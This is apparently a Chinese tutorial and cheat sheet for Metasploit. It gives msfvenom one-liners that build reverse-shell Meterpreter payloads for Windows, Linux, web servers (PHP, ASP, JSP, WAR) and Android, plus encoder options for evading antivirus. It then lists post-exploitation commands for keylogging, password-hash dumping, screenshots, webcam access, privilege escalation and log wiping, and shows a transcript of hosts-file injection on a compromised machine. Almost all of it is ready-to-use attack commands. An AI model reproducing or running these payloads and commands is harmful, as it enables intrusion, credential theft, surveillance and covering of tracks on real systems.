[⊙成功在于你坚持了别人坚持不了的东西⊙]
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
exploit(漏洞利用程序模板):包含各种 PoC 验证程序,用于验证利用特定漏洞(exploit)的可行性。payload(有效载荷模板):包含各种恶意程序,用于在目标系统上运行任意命令。它可能是 exploitAuxiliaries(辅助工具模板):包含一系列扫描、嗅探、拨号测试、指纹识别和其他类型的安全评估程序。Encoders(编码工具模板):在渗透测试中,这个模板用来加密有效载荷,以避免被杀毒软件、防火墙、IDS/IPSNOP(空操作模板):这个模板用于在 shellcode 中插入 NOP(汇编指令)。虽然 NOP 不会进行实际的操作,但是在构造msfconsole
查看数据库连接状态(一般会自动连接)
db_status
help 或者 ? //帮助菜单
exit //退出MSF控制台
back //返回上一级
info //显示一个或者多个模块的信息
show //显示所给类型的模块
background //将当前操作在后台运行
use //使用所选择的模块
set //设置漏洞参数(rhost、rport等)
unset //取消设置漏洞参数
search 漏洞name //查询漏洞工具
use 漏洞ID //使用漏洞工具
show options //查看漏洞工具配置
sessions -i //查看攻击状态
1、Windows/Linux
Windows:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名
2、WEB
PHP:
msfvenom -p php/meterpreter_reverse_tcp lhost=[你的IP] lport=[端口] -f raw > 保存路径/文件名.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口]-f asp > 保存路径/文件名.asp JSP: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f raw > 保存路径/文件名.jsp WAR: msfvenom -p java/jsp_shell_reverse_tcp lhost=[你的IP] lport=[端口]-f war > 保存路径/文件名.war
3、Android
Android:
msfvenom -p android/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -o 保存路径/文件名.apk
1 Options:2 -p, --payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定3 -l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all4 -n, --nopsled 为payload预先指定一个NOP滑动长度5 -f, --format 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)6 -e, --encoder [encoder] 指定需要使用的encoder(编码器)7 -a, --arch 指定payload的目标架构8 --platform 指定payload的目标平台9 -s, --space 设定有效攻击荷载的最大长度
10 -b, --bad-chars 设定规避字符集,比如: '\x00\xff'
11 -i, --iterations 指定payload的编码次数
12 -c, --add-code 指定一个附加的win32 shellcode文件
13 -x, --template 指定一个自定义的可执行文件作为模板
14 -k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
15 --payload-options 列举payload的标准选项
16 -o, --out 保存payload
17 -v, --var-name 指定一个自定义的变量,以确定输出格式
18 --shellest 最小化生成payload
19 -h, --help 查看帮助选项
20 --help-formats 查看msf支持的输出格式列表
check:检查指定特定目标是否存在安全漏洞,并且能被exploit(攻击模块)利用
sessions #sessions –h 查看帮助
sessions -i #进入会话 -k 杀死会话
background #将当前会话放置后台
run #执行已有的模块,输入run后按两下tab,列出已有的脚本
info #查看已有模块信息
getuid # 查看权限
getpid # 获取当前进程的pid
sysinfo # 查看目标机系统信息
ps # 查看当前活跃进程 kill 杀死进程
idletime #查看目标机闲置时间
reboot / shutdown #重启/关机
shell #进入目标机cmd shell
ipconfig/ifconfig #查看IP地址
netstat –ano #查看端口情况
getproxy #查看代理信息
route #查看路由
inconfig:列举被渗透主机的网络接口信息
arp #列举被渗透主机的ARP缓存
shell:获取被渗透主机的cmd shell
getuid:获取当前用户信息
getsystem:提权
getpid:查看Meterepreter会话在被渗透主机内的进程号
ps:列举被渗透主机的所有进程号
sysinfo:列举被渗透主机的信息系统
upload /initrd.img C:\\ :将文件上传到目标系统
rmdir **.txt :删除文件
enumdesktops :桌面命令
screenshot :截图
webcam_list :摄像头
获取键盘记录:1. keyscan_start2. keyscan_dumprun hashdump :获取密码哈希值
clearev :清除系统日志
msf6 exploit(windows/local/ms10_015_kitrap0d) > use post/windows/manage/inject_host
msf6 post(windows/manage/inject_host) > optionsModule options (post/windows/manage/inject_host):Name Current Setting Required DescriptionDOMAIN yes Domain name for host file manipulation.IP yes IP address to point domain name to.SESSION yes The session to run this module on.msf6 post(windows/manage/inject_host) > set session 1
session => 1
msf6 post(windows/manage/inject_host) > set ip 192.168.1.113
ip => 192.168.1.113d
msf6 post(windows/manage/inject_host) > set domain www.tianxiu.com
domain => www.tianxiu.com
msf6 post(windows/manage/inject_host) > exploit[*] Inserting hosts file entry pointing www.tianxiu.com to 192.168.1.113..
[+] Done!
[*] Post module execution completed
msf6 post(windows/manage/inject_host) >
实践案例:
网络安全:kali之MSF工具基本使用方法
如有侵权,请联系删除!
下一篇:破解系统密码